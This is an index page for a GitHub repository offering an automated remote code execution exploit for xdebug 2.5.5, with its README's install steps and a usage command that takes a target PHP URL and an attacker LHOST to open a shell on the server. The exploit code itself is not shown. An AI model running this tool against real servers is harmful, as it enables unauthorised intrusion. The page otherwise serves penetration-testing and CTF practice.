Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/d3ext/xdebug-exploit

xdebug 2.5.5 RCE exploit
https://github.com/d3ext/xdebug-exploit

black-hat ctf exploit hacker hacking hackthebox kali mrrobot offensive-security oscp owasp php python rce vuln vulnerability xdebug xdebug-exploit

Last synced: 3 months ago
JSON representation

xdebug 2.5.5 RCE exploit

Host: GitHub
URL: https://github.com/d3ext/xdebug-exploit
Owner: D3Ext
License: gpl-3.0
Created: 2022-07-04T12:30:17.000Z (over 2 years ago)
Default Branch: main
Last Pushed: 2022-08-23T21:37:02.000Z (over 2 years ago)
Last Synced: 2024-10-13T08:09:50.828Z (4 months ago)
Topics: black-hat, ctf, exploit, hacker, hacking, hackthebox, kali, mrrobot, offensive-security, oscp, owasp, php, python, rce, vuln, vulnerability, xdebug, xdebug-exploit
Language: Python
Homepage:
Size: 51.8 KB
Stars: 29
Watchers: 2
Forks: 7
Open Issues: 1
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

README

        ```

 __  _____  ___ ___ _   _  ___   ___          _     _ _   

 \ \/ /   \| __| _ ) | | |/ __| | __|_ ___ __| |___(_) |_ 

  >  <| |) | _|| _ \ |_| | (_ | | _|\ \ / '_ \ / _ \ |  _|

 /_/\_\___/|___|___/\___/ \___| |___/_\_\ .__/_\___/_|\__|

                                        |_|               

```

`An automated exploit to the xdebug 2.5.5 RCE vulnerability`

## Download:

> Download from package

```sh

pip3 install xdebug-exploit

```

> Download from source

```sh

git clone https://github.com/D3Ext/XDEBUG-Exploit

cd XDEBUG-Exploit

python3 xdebug.py

```

> One-Liner

```sh

git clone https://github.com/D3Ext/XDEBUG-Exploit && cd XDEBUG-Exploit && pip3 install requirements.txt && python3 xdebug.py

```

## Usage:

To exploit a target using a vulnerable version (v2.5.5) you have to especify the URL of a php file of the web page(Example: http://10.10.10.83/index.php) and also especify the LHOST (Example: 10.10.x.x)

```sh

python3 xdebug.py -u http://10.10.10.83/index.php -l 10.10.16.3

```

And if the target is vulnerable, the exploit starts a fake-shell to execute php code.

*\*(In some cases the output won't be perfect and you only will see the first line of the executed command, this is not a problem of the script, the vuln is like this)\**

## Demo:



**If you consider this project has been useful, I would really appreciate supporting me by giving this repo a star or buying me a coffee.**

[!["Buy Me A Coffee"](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://www.buymeacoffee.com/d3ext)

Copyright © 2022, *D3Ext*